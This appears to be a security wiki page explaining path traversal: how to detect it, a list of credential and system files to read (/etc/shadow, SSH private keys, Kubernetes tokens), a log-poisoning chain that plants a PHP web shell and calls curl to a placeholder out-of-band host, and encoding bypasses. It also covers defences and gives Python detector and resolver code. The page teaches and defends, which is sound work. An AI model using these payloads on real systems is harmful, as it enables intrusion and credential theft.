Introduction
Path traversal (directory traversal) is an attack technique that applies when input received from a user is handled by the backend as a path: an attacker manipulates that input to reach a path of their choosing and perform actions there.
It occurs most often when handling files. When a file name or similar value is taken from the user, the user can use syntax such as ../ to move to a parent directory, or step outside the permitted directory and read system files.
Offensive techniques
Detect
Any place in a web service where user-supplied data (parameters, headers, and so on) is handled by the server as a path is a candidate. The simplest way to identify it is to request a page whose response can be distinguished, as below, while checking whether special sequences such as ../ are processed.
GET /download?filename=123.txt => (200 OK)
GET /download?filename=444.txt => (404 NotFound)
GET /download?filename=./123.txt => (200 OK)
In the case above, calling ./123.txt in path form was processed normally, which leaves two possibilities:
- the value was actually processed as a path
- backend security logic replaced ./ with an empty string
To rule out the second case, make a call of the following shape:
GET /download?filename=./123.txt (200 OK)
GET /download?filename=..//123.txt (404 NotFound)
If ./ were being blanked, ..//123.txt would lose its ./ and become ./123.txt, and if the filter runs repeatedly it would end up as 123.txt, so blanking logic should yield 200 OK. The example above returns 404 instead, which means the path syntax (../) was actually processed, and the endpoint can be considered vulnerable to some degree.
Exploitation
Get system files
Once path traversal is judged to be possible, the next step is to read important system files or manipulate the path so that the service action behaves differently than intended. The paths commonly used to read system files are listed below.
Linux server
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the file descriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db
Windows server
c:\windows\system32\license.rtf
c:\windows\system32\eula.txt
c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/system volume information/wpsettings.dat
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
c:/windows/repair/sam
c:/windows/repair/system
RCE with Log poisoning
When the service with path traversal runs in an environment such as PHP or ASP, where server-side code is selected by file extension alone without separate routing, and the file is loaded with a function such as include(), combining it with log poisoning can escalate the impact to RCE. (This is the LFI that is usually talked about.)
First request (log poisoning)
GET / HTTP/1.1
User-Agent: aa<?php echo system($_GET['cmd']); ?>bb
Second request (path traversal)
GET /file.php?path=/var/log/apache2/access.log?cmd=curl%20<OAST>/rce HTTP/1.1
API Path Manipulation
When one API call produces a chain of requests across two or more hops, as with custom schemes, deep links or reverse proxy setups, path traversal can be used to forge the API address. Assume that calling the custom scheme below causes the API request shown in the second code block.
testapp://profile?id=4541
GET /users/4541/profile HTTP/1.1
If the id parameter is given path traversal syntax so that the API path is altered, an unintended function can be executed with the user's session.
testapp://profile?id=../manage/delete-account?
GET /users/../manage/delete-account?/profile HTTP/1.1
Relative Path Overwrite
[ Req ]
GET /page?sink=../../../upload/my_script.js
[ Res ]
...
<script src="asset/js/vendor/../../../upload/my_script.js"></script>
...
For details on RPO (Relative Path Overwrite), see the Cullinan > Relative Path Overwrite (RPO) document.
Bypass protection
Basic
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
16 bits Unicode encoding
. = %u002e
/ = %u2215
\ = %u2216
UTF-8 Unicode encoding
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
Bypass "../" replaced by ""
..././
...\.\
Bypass "../" with ";"
..;/
http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
Double URL encoding
. = %252e
/ = %252f
\ = %255c
http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
UNC Bypass
\\localhost\c$\windows\win.ini
NGINX/ALB Bypass
http://nginx-server/../../ => 400
http://nginx-server////////../../ => 200
Tomcat via reverse proxy mapping
In Tomcat, /..;/ in a path is mapped the same way as /../. This makes path traversal possible in service structures with multiple hops, for example behind a proxy mapping like the one below.
location /api/ {
    # the trailing slash makes nginx substitute the prefix, so the client-supplied
    # remainder (including ..;/ segments) is appended to the internal path
    proxy_pass http://internal_server/testapp/internal/api/;
}
http://nginx-server/api/..;/..;/..;/docs/
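As an added example (not code from the Cullinan page), the following Python detector normalises the encodings listed in this bypass section, including double encoding, overlong UTF-8, %uXXXX and Tomcat's ..;/, and flags traversal probes in web-server access logs. The log lines, client addresses, timestamps and sizes are constructed for the example.

```python
import re
from urllib.parse import unquote

# Overlong UTF-8 and %uXXXX spellings from the list above, as they look after a
# latin-1 percent-decode (one character per byte).
OVERLONG = {"\xc0\xae": ".", "\xe0\x80\xae": ".", "\xc0.": ".",
            "\xc0\xaf": "/", "\xe0\x80\xaf": "/", "\xc0/": "/",
            "\xc0\\": "\\", "\xc0\x80\\": "\\"}
WIDE = {"\uff0e": ".", "\u2215": "/", "\u2216": "\\"}
SEGMENT = re.compile(r"(?:^|[/?=&;])\.\.(?:/|$)")       # a '..' path segment
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed combined-format log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /download?filename=123.txt HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /download?filename=..%2f..%2fetc%2fpasswd HTTP/1.1" 404 0
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /download?filename=%252e%252e%252fetc/passwd HTTP/1.1" 200 1024
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /api/..;/..;/docs/ HTTP/1.1" 200 300
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /download?filename=%c0%ae%c0%ae%c0%afetc/passwd HTTP/1.1" 200 1024
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /download?filename=..././..././etc/passwd HTTP/1.1" 404 0
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /static/app..v2.js HTTP/1.1" 200 9000
"""

def normalise(raw: str) -> str:
    """Reduce a request path to a plain '/'-separated form before matching."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), raw)
    for _ in range(3):                  # peel single, double and triple encoding
        decoded = unquote(s, encoding="latin-1")
        if decoded == s:
            break
        s = decoded
    for seq, ch in {**OVERLONG, **WIDE}.items():
        s = s.replace(seq, ch)
    return re.sub(r"\.\.;[^/]*/", "../", s.replace("\\", "/"))  # Tomcat '/..;/'

def is_traversal(raw_path: str) -> bool:
    """True if a '..' segment appears directly, or after one '../' is stripped
    (the second check catches the '..././' trick aimed at strip-once filters)."""
    s = normalise(raw_path)
    return bool(SEGMENT.search(s) or SEGMENT.search(s.replace("../", "")))

def scan(log_text: str) -> list:
    """Return (client, status, raw path) for every request that looks like a probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal(m.group(3)):
            hits.append((m.group(1), int(m.group(4)), m.group(3)))
    return hits
```

Requests that normalise to a '..' segment are reported regardless of status code, since a 404 probe is as useful a signal as a 200 that succeeded.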
Defensive techniques
To defend against this, any feature that handles a path, such as a file name, and takes user input must be restricted so that a parent path cannot be specified with ../ and the like. Two kinds of countermeasure are commonly used.
Escape
Validate the user-controlled segment so that special characters that can change the path, such as ../, are not processed. There are many ways to validate, but the common elements are restricting . and / and, because encoded forms may also be interpreted, fully decoding the input first and then removing . and / repeatedly.
To keep user control to a minimum, it is of course also good to reduce the portion of the path that user input can affect.
Permission (Only filesystem)
For file access, it is also a good idea to fix the top-most directory the process is allowed to move within. This strongly blocks attempts to read system files. The downside is that, while this method holds up against bypass techniques, files inside the permitted directory can still be read, and it only addresses traversal attacks on files and directories.
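As an added example (not code from the Cullinan page), the following Python combines the two countermeasures above, full decoding followed by canonical resolution inside a fixed base directory, and runs it against the probe payloads used earlier on this page. The temporary download directory and its 123.txt are constructed for the demo.

```python
import os
import tempfile
from urllib.parse import unquote

def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until nothing changes, so %252e (double encoding)
    ends up as '.' just like a single %2e would."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many layers of percent-encoding")

def naive_strip(filename: str) -> str:
    """The weak 'remove ../ once' filter that '..././' defeats (for contrast)."""
    return filename.replace("../", "")

def resolve_under_base(base_dir: str, user_path: str) -> str:
    """Return the real path for user_path, or raise ValueError if it leaves base_dir.
    Backslashes count as separators, NUL bytes are rejected and a leading '/' is
    dropped so absolute input cannot replace the base."""
    decoded = fully_decode(user_path).replace("\\", "/")
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded.lstrip("/")))
    # realpath collapses every '.', '..' and symlink before the containment check,
    # so there is no string filter left for ..././ or ..\\ variants to bypass.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate

def demo() -> dict:
    """Serve the page's probe payloads from a constructed directory holding only 123.txt."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "downloads")
        os.makedirs(base)
        with open(os.path.join(base, "123.txt"), "w") as fh:
            fh.write("hello\n")
        payloads = ["123.txt", "./123.txt", "..//123.txt", "..././123.txt",
                    "%2e%2e%2f123.txt", "%252e%252e%252f123.txt", "..\\..\\123.txt"]
        verdicts = {}
        for p in payloads:
            try:
                target = resolve_under_base(base, p)
                verdicts[p] = "served" if os.path.isfile(target) else "not found"
            except ValueError:
                verdicts[p] = "blocked"
        verdicts["naive:..././123.txt"] = naive_strip("..././123.txt")  # '../123.txt'
        return verdicts
```

Note that ..././123.txt is not "blocked" but "not found": once the path is resolved rather than filtered, it simply names a non-existent directory inside the base.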
K/V-based file systems
AWS S3 is KV (key/value) based storage. Because such storage simply fetches the V mapped to a K, it can generally withstand path traversal attacks unless a malicious V has been set for a particular K beforehand.
Tools
- https://github.com/wireghoul/dotdotpwn
Articles
- https://www.hahwul.com/2019/09/23/path-traversal-pattern-of-dotdot-slash/
- https://www.hahwul.com/2019/07/02/zap-send-any-tools/#send-to-ddpdotdotpwn
- https://www.hahwul.com/2019/03/17/critical-vulnerability-in-action-view-of-ruby-rails/
- https://www.hahwul.com/2016/05/02/web-hacking-dotdotpwn-path-traversal/
References
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal